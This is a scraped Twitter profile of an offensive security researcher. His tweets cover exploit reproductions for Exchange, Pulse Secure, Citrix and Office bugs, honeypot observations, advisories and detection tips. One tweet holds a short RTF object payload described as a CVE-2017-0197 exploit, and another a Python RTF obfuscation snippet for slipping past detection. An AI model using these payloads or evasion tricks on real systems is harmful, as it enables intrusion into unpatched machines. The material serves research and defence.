Rich Warren

@buffaloverflow

Followers
10,546
Following
665
Media
271
Statuses
1,531

Red Team & Offensive Security Research @AmberWolfSec

Joined May 2011
@buffaloverflow
Rich Warren
6 years
My dog just carried out a Denial of Service attack against me. Ate my Bitlocker key and bit the end off my Yubikey. That was not in my threat model 🤯
27
377
1K
@buffaloverflow
Rich Warren
4 years
Missed this, but last week someone exploited my Exchange server with proxylogon and then patched it via the webshell 😆
20
266
1K
@buffaloverflow
Rich Warren
3 years
Popping calc with CVE-2021-40444 (MS Office exploit) Thanks to @BouncyHat for collaborating 😀 Not planning to release but my bet is with itw exploits, it won't be long..
19
309
872
@buffaloverflow
Rich Warren
2 years
Cobalt Strike CVE-2022-39197. Quite easy to repro from the release notes. Red Teamers, patch your Team Servers 🙂
14
174
591
@buffaloverflow
Rich Warren
4 years
Ok, we are seeing active exploitation of CVE-2020-5902 Patch it today
7
260
586
@buffaloverflow
Rich Warren
3 years
Wrote a Mach-O loader in Node.js
10
72
571
@buffaloverflow
Rich Warren
4 years
.NET exploit for Zerologon is now released 🥳 Identify and exploit vulnerable DCs using execute-assembly, no python required Includes detection tips for each step of the exploit chain. PRs accepted for more detections! 🙏 Go find those DCs and patch!
@buffaloverflow
Rich Warren
4 years
Zerologon (CVE-2020-1472) in .NET for some execute-assembly fun.. muahaha 👿😄
3
149
413
7
299
578
@buffaloverflow
Rich Warren
5 years
We found an RCE vulnerability in the Citrix Workspace & Receiver clients. It can be triggered through the browser simply by visiting a malicious website. No need to log into a rogue Citrix server.. Fix has now been released.
9
297
527
@buffaloverflow
Rich Warren
4 years
0-Domain Admin in 10 seconds with Zerologon (CVE-2020-1472) Using @_dirkjan 's NetrServerPasswordSet2 commit to impacket 😀🥳
9
203
527
@buffaloverflow
Rich Warren
5 years
CVE-2019-19781 post-exploitation notes: If you are seeing attackers reading your /flash/nsconfig/ns.conf file then you need to change all passwords. The SHA512 passwords are easily crackable with hashcat.
8
174
422
@buffaloverflow
Rich Warren
5 years
CVE-2019-11542 is a nice (post-auth) stack buffer overflow in Pulse Secure VPN. ❌ no ASLR ❌ no NX ✅ remote root. Great find by @orange_8361 & @mehqq_
5
154
417
@buffaloverflow
Rich Warren
6 years
Wow, this broke a lot of people's lateral movement. Good job MSFT! Now is a fun time for WMI research.
11
162
383
@buffaloverflow
Rich Warren
8 years
Fuzzing
6
222
358
@buffaloverflow
Rich Warren
5 years
In case you were wondering about CVE-2019-11539, here is a video showing how you can get a root shell on the Pulse VPN appliance.
4
116
319
@buffaloverflow
Rich Warren
5 years
Decrypting cookies/passwords in Chrome 80 😄
5
89
307
@buffaloverflow
Rich Warren
8 months
I reproduced the full chain of Ivanti Connect Secure CVE-2023-46805 (auth bypass) + CVE-2024-21887 (RCE) 🥳 While it is mentioned in the advisory, it's worth noting that 21887 is multiple command injection vulns under one CVE. I counted 5 before I got bored looking 😆
@buffaloverflow
Rich Warren
9 months
Not sure that it's the same post-auth as the itw Pulse Secure exploit, but it's *an* RCE 😛 Still need an auth bypass..
3
9
67
7
80
305
@buffaloverflow
Rich Warren
4 years
Here is a CNA script for abusing the print spooler named pipe impersonation trick by @itm4n Useful to get SYSTEM with only SeImpersonatePrivilege and can be used as an alternative to getsystem. Came in handy recently and wanted to share the ❤️
3
123
301
@buffaloverflow
Rich Warren
4 years
Just published advisories for Pulse Connect Secure CVE-2020-8260 and CVE-2020-8255. Auth file read and auth RCE. Documenting some new RCE techniques for arbitrary file write on PCS with @johnnyspandex
1
148
296
@buffaloverflow
Rich Warren
4 years
Releasing PyBeacon. A collection of scripts for dealing with Cobalt Strike beacons in Python. Covers:
- staging
- asymmetric encryption and metadata parsing
- symmetric encryption (tasks) and decoding
- beacon registration
- beacon callbacks
3
120
280
@buffaloverflow
Rich Warren
3 years
Some more macOS fun
5
30
254
@buffaloverflow
Rich Warren
4 years
Here is the advisory for CVE-2021-21518, which is a Local Privilege Escalation vulnerability I found in Dell SupportAssist
9
96
246
@buffaloverflow
Rich Warren
5 years
Added support for SMB2 snapshot listing/browsing/downloading to impacket. Cool feature for dumping NTDS etc. over pure SMB
1
116
246
@buffaloverflow
Rich Warren
2 years
Finishing the week off of Twitter with a nice 0day 🙂
7
15
243
@buffaloverflow
Rich Warren
3 years
Here is the advisory for CVE-2021-22937, which is a patch bypass of CVE-2020-8260 (Pulse Connect Secure RCE)
6
108
240
@buffaloverflow
Rich Warren
8 years
Cool little persistence trick on Windows 10 (abusing OneDrive.exe)
2
156
234
@buffaloverflow
Rich Warren
5 years
Confirming SandboxEscaper's latest AppXSvc LPE (aka CVE-2019-0841-BYPASS) is indeed a 0day and works up to the latest 1903 build (but no collector abuse anymore 😢). Weaponised demo on 1809..
4
108
226
@buffaloverflow
Rich Warren
7 years
I was curious if it was possible to exploit CVE-2017-8570 (aka composite moniker) using Packager. Looks like it works nicely :D
4
124
209
@buffaloverflow
Rich Warren
5 years
Wrote a .NET exploit for CVE-2019-0841. h/t @rogue_kdc for vuln & @ryHanson for exploitation vector 🙏
4
98
202
@buffaloverflow
Rich Warren
4 years
Had a lot of fun this weekend working on exploiting Exchange with @BouncyHat and @amlweems . Between us we managed to get the full RCE chain working on a single server environment 🎉
9
54
209
@buffaloverflow
Rich Warren
4 years
Here is an example showing how to do named pipe IPC in Cobalt Strike. Useful for getting output from (self)injected ReflectiveDlls. CS 4.1 bofs sound like they will solve this problem, but maybe still useful 👍
4
82
195
@buffaloverflow
Rich Warren
3 years
btw, it's not just CVE-2021-40444 that this trick is useful for. For example, it works for other RTF-based vectors too, e.g.
@buffaloverflow
Rich Warren
3 years
Not sure if Microsoft fixed this (my VM is unpatched). But it works in explorer preview mode via RTF:
7
49
177
0
61
196
@buffaloverflow
Rich Warren
5 years
Here is the advisory for CVE-2019-11114, a Local Privilege Escalation vulnerability I found in Intel DSA. If you have an Intel based machine, double check if it's installed and update if required 👍
1
106
195
@buffaloverflow
Rich Warren
2 years
Windows 11 (May) + Office Pro Plus (April) + Preview pane enabled
5
66
197
@buffaloverflow
Rich Warren
5 years
Exploit for @itm4n 's CVE-2020-0863, with this beautiful trick by @jonasLyk to turn it into arbitrary file write 🤩🤯 See: Thanks for sharing, both! 🙏
@jonasLyk
Jonas L
5 years
@itm4n I made it into EOP by making a mount point targeting \\.\pipe\, then creating a named pipe with the name ..\..\something.xml; the dir listing thinks ..\ is part of the filename, so the copy goes outside the intended dir, where I had a symbolic link ready :)
3
3
43
2
73
191
@buffaloverflow
Rich Warren
6 years
FWIW, I had backups. Everything is fine. Dog was just testing my disaster recovery. Good dog.
1
13
184
@buffaloverflow
Rich Warren
4 years
Today we release our blog post that demonstrates a new single request exploit for CVE-2019-19781 that is effective even if all of the "vulnerable" Perl files have been deleted 🙀 We also share stats on devices that are patched but still contain backdoors
7
103
184
@buffaloverflow
Rich Warren
5 years
Had fun today writing a .NET exploit for @itm4n 's CVE-2020-0787 BITS LPE and UsoLoader technique. Check out his blog posts and research if you haven't already. They are all brilliant 👏🙏
3
75
182
@buffaloverflow
Rich Warren
4 years
Build events aren't the only way to backdoor a Visual Studio project. @StanHacked documented some other interesting ways in his awesome "COMpromise" research: TypeLibs are another sneaky way to gain code execution. Yara rule:
2
71
174
@buffaloverflow
Rich Warren
7 years
Turns out it was an 0day at the time! Sample is CVE-2018-0802 😵 "Fw_ Invitation letter of FW review meeting.rtf" sha256 81c733c0bae854e280d0d3c2e7ff1fdcd0f1eef2a653286a641437dcea21f409
@blu3_team
@blu3_team
7 years
#Malware using Word add-in persistence Sample uses the CVE-2017-11882 %temp% dropper method to %APPDATA%\Microsoft\word\startup\w.wll @MalwareParty #infosec
1
29
47
1
72
156
@buffaloverflow
Rich Warren
3 years
Running a Cobalt Strike beacon at WinTCB PPL using a .NET port of PPLDump by @itm4n 😍 Waiting for EDR to mem scan me 😴
5
39
156
@buffaloverflow
Rich Warren
4 years
On CVE-2021-22986 (F5 iControl REST RCE).. This is a great writeup. I've also been looking at this in my spare time and have finally got the full RCE chain working 🚀 Props to @wvuuuuuuuuuuuuu for the awesome notes which helped confirm I was going down the right rabbit holes! 🙏
Writeup has been updated with full details, including IOCs for defenders. The SSRF vector is still developing. I'll upload more code in a bit. 😩
2
25
51
3
52
154
@buffaloverflow
Rich Warren
7 years
Thanks to @_jsoo_ for his idea, here is a fun way to exploit CVE-2017-8759 via CSV in Excel. One line exploits ftw 😂
3
82
150
@buffaloverflow
Rich Warren
3 years
CVE-2021-22900 (Pulse Secure authenticated RCE), is just a variant of CVE-2020-8260
2
40
152
@buffaloverflow
Rich Warren
3 years
Got the ProxyShell exploit by @orange_8361 working. That was fun 😃 Thanks Orange for the amazing research, and also to @peterjson and @testanull for their detailed blog post 🙏
2
26
147
@buffaloverflow
Rich Warren
6 years
This creative, obfuscated RTF doc exploits Equation Editor 7(!) times to write out b64 file to %tmp%, then decodes /w certutil and executes .bat. Loads remote HTA from RFC1918 address. Malware testing? Red Team? 🤷‍♂️ Fun though 😋
7
76
145
@buffaloverflow
Rich Warren
6 years
Today's RTF obfuscation trick: obj = "010500000200" s = "" for x,y in zip(obj[::2], obj[1::2]): s += "%s%s\\'%s" % (x+y, randint(0, 9), os.urandom(1).encode('hex')) print s
2
62
144
@buffaloverflow
Rich Warren
7 years
Just realised the exploit for CVE-2017-0197 (Office 2010) fits exactly in one tweet 😁 /cc @yorickkoster
@buffaloverflow
Rich Warren
7 years
{\rt\object\objocx{\objdata 0105000002000000160000004f6e654e6f74654d6f62696c652e53706e53796e6300000000000000000001000000410105000000000000}}
1
15
22
0
69
144
@buffaloverflow
Rich Warren
8 months
In personal news, I no longer work for NCC Group. I’m taking some time out, but hopefully will announce something exciting in the near future. Until then I’ll be playing video games, working on my old VW and breaking my one rule of staying away from computers 👾🥳😎
24
3
140
@buffaloverflow
Rich Warren
5 years
🚨 CVE-2019-11510 under active exploitation 🚨 From: 185.25.51[.]58 Exploiting the recent Pulse Secure SSL VPN arbitrary file download vulnerability to extract cleartext passwords and hashes. FWIW this honeypot was online for ~48 hrs. If you have an unpatched VPN, patch quick
3
86
131
@buffaloverflow
Rich Warren
3 years
Some Friday fun: cabinet directory traversal (CVE-2021-40444?) can be used for non-office/IE exploits too .. 😀
3
33
123
@buffaloverflow
Rich Warren
5 years
Exploit for Citrix NetScaler CVE-2019-19781. Very interesting bug(s)! 'touch /tmp/CVE-2019-19781' because I'm lazy/busy 😉
1
28
122
@buffaloverflow
Rich Warren
5 years
Quick scanner to check your Pulse Secure VPN versions. You can use it to detect if your server is vulnerable to CVE-2019-11510 and others.
4
36
123
@buffaloverflow
Rich Warren
7 years
I wrote an exploit for CVE-2017-11882 that uses Packager.dll to drop+exec (as seen itw by @MalwareParty + @HaifeiLi ). Maybe it's useful if you don't wanna use webdav.
1
80
122
@buffaloverflow
Rich Warren
7 years
I added a write up of this exploit along with some details of the patch and #Yara detection rules here
@buffaloverflow
Rich Warren
7 years
CVE-2017-8759 exploited in PowerPoint (just for some fun) :D
1
16
53
3
77
118
@buffaloverflow
Rich Warren
3 years
Print Your Shell: A great article (from 2009) about some of the issues of point-and-print and exploiting the Windows print spooler 🖨🐚
@buffaloverflow
Rich Warren
8 years
My original exploit of MS16-087 from 2014
1
10
25
1
45
116
@buffaloverflow
Rich Warren
2 years
Got the #ProxyNotShell RCE exploit working. Pretty cool set of bugs! Just need to figure out how to hit the sink from low priv (I have an idea 👻)
4
21
112
@buffaloverflow
Rich Warren
3 years
Another good thing to look out for is webshells saved as attachments in people's mailboxes. They are encoded, but can be decoded with this simple script: #ProxyShell
3
39
114
@buffaloverflow
Rich Warren
7 years
DCOM is literally a wonderland
2
37
107
@buffaloverflow
Rich Warren
4 years
Finally had some time today to write something I've wanted every time I need to dump cookies.. 🍪 Just extract masterkey once, download the Cookie file and import 🪄
11
25
109
@buffaloverflow
Rich Warren
8 months
Why can my SSL VPN appliance run a bitcoin miner, but not EDR? 🤔
@GreyNoiseIO
GreyNoise
8 months
We're seeing more than just scanning for the recent pair of Ivanti Connect Secure vulnerabilities (CVE-2023-46805 and CVE-2024-21887) - we're seeing real exploitation attempts - this one installs a Bitcoin miner! Patch your hosts ASAP!
3
47
126
5
27
105
@buffaloverflow
Rich Warren
4 years
If you are wanting to develop Cobalt Strike bofs in Visual Studio, this template might be useful for you: It can probably be improved with some better compiler flag combos, but a good starter if like me you prefer working in VS 👍
1
41
105
@buffaloverflow
Rich Warren
4 years
Hmm seems like not everyone understood. This is a honeypot. I'm not outsourcing my patching to randoms on the internet 😂 Of course their intentions were bad. They did it on multiple servers and left their webshells there for persistence
1
3
98
@buffaloverflow
Rich Warren
4 years
3 months of honeypot data related to F5 (& a small amount of Citrix) exploitation released today. Includes:
✅ PCAP of all web traffic
✅ IDS Rules for mitigation F5 bypass
✅ Interesting findings and stats
✅ A pretty cool webshell
Dive into the data and see what you can find!
@NCCGroupInfosec
NCC Group Research & Technology
4 years
Blog: We have released three months of honeypot web traffic data related to the F5 CVE-2020-5902 and Citrix CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196 exploitation events from earlier this year - insights and intel on Iran and others -
1
51
103
1
46
96
@buffaloverflow
Rich Warren
5 years
RE: CVE-2019-19781 detections (Citrix NetScaler/ADC RCE) Although the vulnerable code mandates that the first request *must* be a POST request - the second request can be a HEAD or even a PUT and will still get processed by the template engine.
1
36
94
@buffaloverflow
Rich Warren
4 years
The Chlonium repo is now public, and now supports additional Chromium-based browsers such as Edge and Vivaldi, thanks to @dtmsecurity 's suggestion! 🙏
2
48
96
@buffaloverflow
Rich Warren
4 years
Zscaler has published an advisory for CVE-2020-11635, an LPE vulnerability reported by myself and others. It is fixed on client connector versions 3.1.0 and upwards 🙂
5
33
91
@buffaloverflow
Rich Warren
4 years
First exploits coming from 🇮🇹
8
24
88
@buffaloverflow
Rich Warren
3 years
I love the smell of remote root in the morning ☕️😉🐛
2
1
87
@buffaloverflow
Rich Warren
3 years
Some attempts itw on CVE-2021-20038 (SonicWall SMA RCE). Also some password spraying of default passwords from the past few days. Remember to update AND change default passwords :)
6
30
81
@buffaloverflow
Rich Warren
6 years
Hash for this sample was: CVE-2018-8174 IE #0day . Great analysis here:
2
59
85
@buffaloverflow
Rich Warren
7 years
Wow, interesting sample.. I think I count 3 exploits (CVE-2017-11882, CVE-2018-0802, CVE-2017-8570). Wins 🏅4 noisiest sample 4sure! 😂 Looks like it's dropping #remcos 12/57 on VT. @anyrun_app working nice 👍
5
36
83
@buffaloverflow
Rich Warren
4 years
A new blog post I am working on. Can you guess what it does? 🤫😉
6
9
82
@buffaloverflow
Rich Warren
3 years
I went to check for these IOCs on my Exchange honeypot, but instead of finding APT, all I got was this lousy Zeppelin ransomware note 😅 And all my files were indeed encrypted, including the webshells (oops!) ProxyShell continues to be a trash fire
3
12
83
@buffaloverflow
Rich Warren
2 years
Segmentation fault (core dumped)
4
11
81
@buffaloverflow
Rich Warren
7 years
I mentioned this before but didn't try it. It works 👍 dropper.rtf -> load doc from webdav -> serve correct macro stripped doc for detected office ver Problem: Background:
@buffaloverflow
Rich Warren
7 years
@malcomvetter @JohnLaTwC @ItsReallyNick @Mao_Ware @VessOnSecurity True. You mean the differences in office versions? I think that could be solved by using an intermediate doc with ole2link to remote (macro)doc. The server then serves correct version based on user agent. Could be a fun one to try :)
0
0
2
2
38
81
@buffaloverflow
Rich Warren
2 years
Here's an MHT version (saved as .doc) to break your Yara rules 😈 You can easily see the URL Moniker within the XML
5
42
77
@buffaloverflow
Rich Warren
5 years
If you see the attacker reading /var/nstmp/sess_* then they just stole authenticated cookies which can be re-used
1
21
73
@buffaloverflow
Rich Warren
5 years
Detection: Exploited with 1 POST + 1 GET request. As mentioned before, you can look for "/vpns/" in the path, but also "../" in header values for the POST. Probably shouldn't say *which* header at this point. This will be followed by a GET request for a file ending in ".xml".
2
18
72
@buffaloverflow
Rich Warren
4 years
Adding some new features to our internal inline-execute-assembly BOF :D Safety first!
4
19
72
@buffaloverflow
Rich Warren
2 years
I’ve not looked at the Exchange bugs yet, but my speculation is that because MS never fixed the path confusion of ProxyShell (just stopped sending auth to the backend), this same path can be used to send your own auth or attack another unauth backend svc
3
12
69
@buffaloverflow
Rich Warren
4 years
Useful to know: the tool works on a default domain-joined firewall config without the need for admin. How? We used a technique from @NinjaParanoid to make use of http.sys with default allowed URL ACLs / firewall rules. Worth blocking these if not needed
@NinjaParanoid
Chetan Nayak (Brute Ratel C4 Author)
4 years
#PROTIP : If you can't listen on port 80 during a bind shell, try adding the URI '/Temporary_Listen_Address/' to ur listener. Magic! You don't need administrative privileges to listen on port 80 on Windows anymore #redteam #windows
20
519
1K
1
21
71
@buffaloverflow
Rich Warren
5 years
Ok AES-256 encrypted LDAP passwords in ns.conf in ADC/NetScaler have been broken. You need to change those too.
@dozernz
dozer
5 years
@buffaloverflow @n0x08 just looked at that, the new key is right there too :) just switched to aes256-cbc, see
2
8
25
1
43
71
@buffaloverflow
Rich Warren
6 years
Threadkit seems to have a new CVE-2018-4878 exploit, or at least I've not seen it before. Is this new?
4
41
69
@buffaloverflow
Rich Warren
5 years
Diaghub is one way, but abusing trigger-start services can be a fun method to exploit arbitrary file writes too. ETW, COM, RPC. Lots to dig into!
4
15
69
@buffaloverflow
Rich Warren
3 years
The Pulse Secure integrity checker contains hashes for a load of different PCS firmware versions. This can be used to build a passive version fingerprint
2
22
70
@buffaloverflow
Rich Warren
7 years
@moo_hax @ryHanson @subTee This is really cool! It works via DCOM too (for lateral movement) 😀
3
30
66
@buffaloverflow
Rich Warren
7 years
Oh what do we have here? An updated "Word Silent Exploit Builder" appears. Complete with stolen exploit code. @ItsReallyNick this is where your 15 character-name SCT files are coming from 🙃 Cracked? ✅ Backdoored? 🤷‍♀️
3
21
66
@buffaloverflow
Rich Warren
6 years
If you are looking for the decrypted SWF for CVE-2018-5002, the full hash is: f63a51e78116bebfa1780736d343c9eb
5
40
67
@buffaloverflow
Rich Warren
3 years
They are using this exploit. I guess you get what you pay for 😋 Once they drop the follow-up webshell, they delete the first. Might be a race condition if they delete it too early. Not going to debug it for them though! 😂
0
12
66
@buffaloverflow
Rich Warren
7 years
Flash is dead, long live HTA!
3
25
63
@buffaloverflow
Rich Warren
4 years
Time to patch those pulses again! Fix for CVE-2020-8243 is out, which is an authenticated RCE in template toolkit (sound familiar?) 😉
0
26
65
@buffaloverflow
Rich Warren
3 years
Pushed a small update to Chlonium to support offline statekey decryption using @harmj0y 's excellent SharpDPAPI project. Supports decryption with a domain backup key or user's password 👍
0
18
66
@buffaloverflow
Rich Warren
5 years
Excel is weird
1
10
63
@buffaloverflow
Rich Warren
4 years
Confirmed Sonicwall 0day + indiscriminate ITW exploitation 👀
@NCCGroupInfosec
NCC Group Research & Technology
4 years
Per the @SonicWall advisory - - we've identified and demonstrated exploitability of a possible candidate for the vulnerability described and sent details to SonicWall - we've also seen indication of indiscriminate use of an exploit in the wild - check logs
6
43
80
1
29
59